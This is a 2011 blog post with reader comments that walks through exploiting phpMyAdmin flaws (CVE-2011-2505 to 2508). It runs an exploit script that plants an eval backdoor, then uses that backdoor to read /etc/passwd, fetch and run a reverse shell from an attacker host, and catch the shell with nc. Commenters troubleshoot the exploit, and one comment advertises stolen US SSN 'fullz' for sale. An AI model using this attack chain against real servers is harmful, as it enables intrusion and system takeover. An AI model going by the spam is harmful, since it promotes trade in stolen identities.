Friday, 5 August 2011

phpMyAdmin Prior to 3.3.10.2 and 3.4.3.1 Multiple Remote Vulnerabilities



phpMyAdmin Prior to 3.3.10.2 and 3.4.3.1 Multiple Remote Vulnerabilities
Bugtraq ID: 48563
Class: Input Validation Error
CVE: CVE-2011-2505
CVE-2011-2506
CVE-2011-2507
CVE-2011-2508
Remote: Yes
Local: No
Published: Jul 05 2011 12:00AM
Updated: Jul 26 2011 10:10PM
URL : http://www.securityfocus.com/bid/48563/info

Hello all, this post will be a mix with an old post that I already did wish was "Deface using EVAL() function" + phpmyadmin Prior to 3.3.10.2 and 3.4.3.1.
PhpMyAdmin is prone to multiple remote vulnerabilities, including PHP code-execution and local file-include vulnerabilities.Successful attacks can compromise the affected application and possibly the underlying computer. So, lets test that. We have 2 exploits available.With the first one, we will make the eval option available for us to execute remote commands on the target machine.

php exploit1.php http://172.16.1.18/phpmyadmin
You should get something like this
[i] Running...
[*] Contacting server to retrive session cookie and token.
[i] Cookie:dkucqrelskbq2k8kd2ouive7rsb9t176
[i] Token:64d4cd9570888c981c127bdf47586d65
[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.
[*] Contacting server to make it save the injected code to a file.
[*] Contacting server to test if the injected code executes.
[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!
[+] Use your browser to execute PHP code like this

http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=echo%20'test';

Great, that means it worked.
Now we apply what I explained before about EVAL().
Before you type all the commands, make sure your attacking server is ready for the reverse connection from the target machine. Type this in the attacking server:
nc -l -p 8080 -vvv

Ok, now lets go back to the browser and upload our shell to the server.

http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("ls -la /");
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("cat /etc/passwd");
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell");
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("chmod 777 /tmp/airwolf_reverse_shell");
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("/tmp/airwolf_reverse_shell");

After you typed this last line, you go to the attacking server shell to see if the target server connected to you.
listening on [any] 8080 ...
172.16.1.18: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.1.79] from (UNKNOWN) [172.16.1.18] 53365


ls
config.inc.php
id
uid=48(apache) gid=48(apache) groups=48(apache)

Yeap, as you can see got our shell in the server.
Have fun ;)

7 comments:

  1. where to download that php exploit!?

    ReplyDelete
  2. Look at the top, there is URL.

    ReplyDelete
  3. Ok thanks! I've got a notice from php...


    [i] Running...
    [*] Contacting server to retrive session cookie and token.
    PHP Notice: Undefined offset: 1 in /home/xxx/Scrivania/phpmyadmin.php on line 92
    [i] Cookie:
    PHP Notice: Undefined offset: 2 in /home/xxx/Scrivania/phpmyadmin.php on line 96
    [i] Token:


    something wrong...

    ReplyDelete
  4. video exploit send ?
    this exploit not video exploit http://www.securityfocus.com/bid/48563/info

    send me link video exploit

    ReplyDelete
  5. [i] Running...
    [*] Contacting server to retrive session cookie and token.
    PHP Notice: Undefined offset: 1 in /home/anand/Desktop/exploit1.php on line 92
    [i] Cookie:
    PHP Notice: Undefined offset: 2 in /home/anand/Desktop/exploit1.php on line 96
    [i] Token:
    [*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.
    [*] Contacting server to make it save the injected code to a file.
    [*] Contacting server to test if the injected code executes.
    [!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.


    can someone help me out:(

    ReplyDelete
  6. Hello Everyone !

    USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.

    All SSN's are Tested & Verified.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If you buy in bulk, will give you discount
    *Sampling is just for serious buyers

    ->Hope for the long term business
    ->You can buy for your specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete